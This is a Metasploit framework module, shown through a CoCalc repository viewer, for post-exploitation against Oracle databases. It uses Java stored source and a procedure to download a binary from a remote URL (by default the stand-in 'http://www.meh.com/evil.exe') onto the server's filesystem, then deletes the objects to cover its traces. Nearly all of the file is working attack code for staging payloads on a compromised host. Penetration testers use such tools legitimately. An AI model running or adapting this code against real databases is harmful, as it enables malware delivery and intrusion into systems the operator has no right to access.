CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle URL Download',

12
      'Description'    => %q{

13
          This module will create a java class which enables the download

14
        of a binary from a webserver to the oracle filesystem.

15
      },

16
      'Author'         => [ 'CG' ],

17
      'License'        => MSF_LICENSE,

18
      'References'     =>

19
        [

20
          [ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ],

21
        ],

22
      'DisclosureDate' => '2005-02-10'))

23


24
      register_options(

25
        [

26
          OptString.new('URL', [ false, 'The URL to download the binary from.',  'http://www.meh.com/evil.exe']),

27
          OptString.new('COPYTO', [ false, 'Location to copy the binary to',  'c:\\meh.exe']),

28
        ])

29
  end

30


31
  def run

32
    return if not check_dependencies

33


34
    java = <<-EOF

35
CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS

36
import java.lang.*;

37
import java.io.*;

38
public class FileUpload

39
{

40
  public static void fileUpload(String myFile, String url) throws IOException

41
  {

42
    File binaryFile = new File(myFile);

43
    FileOutputStream outStream = new  FileOutputStream(binaryFile);

44
    java.net.URL u = new java.net.URL(url);

45
    java.net.URLConnection uc = u.openConnection();

46
    InputStream is = (InputStream)uc.getInputStream();

47
    BufferedReader in = new BufferedReader (new InputStreamReader (is));

48
    byte buffer[] = new byte[1024];

49
    int length = -1;

50
    while ((length = is.read(buffer)) != -1) {

51
      outStream.write(buffer, 0, length);

52
      outStream.flush();

53
    }

54
    is.close(); outStream.close();

55
  }

56
};;

57
EOF

58


59
    procedure = <<-EOF

60
CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2)

61
as language java

62
NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';

63
EOF

64


65
    exec      = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"

66


67
    drops     = "drop java source SRC_FILE_UPLOAD"

68


69
    dropp     = "drop procedure PROC_FILEUPLOAD"

70


71
    begin

72
      print_status("Creating java source 'SRC_FILE_UPLOAD'...")

73
      prepare_exec(java)

74
    rescue => e

75
      return

76
    end

77


78
    print_status("Creating procedure 'PROC_FILEUPLOAD'...")

79
    prepare_exec(procedure)

80


81
    print_status("Trying to download binary from #{datastore['URL']} to #{datastore['COPYTO']}")

82
    prepare_exec(exec)

83


84
    print_status("Removing java source 'SRC_FILE_UPLOAD'...")

85
    prepare_exec(drops)

86


87
    print_status("Removing procedure 'PROC_FILEUPLOAD'...")

88
    prepare_exec(dropp)

89


90
  end

91
end

92


93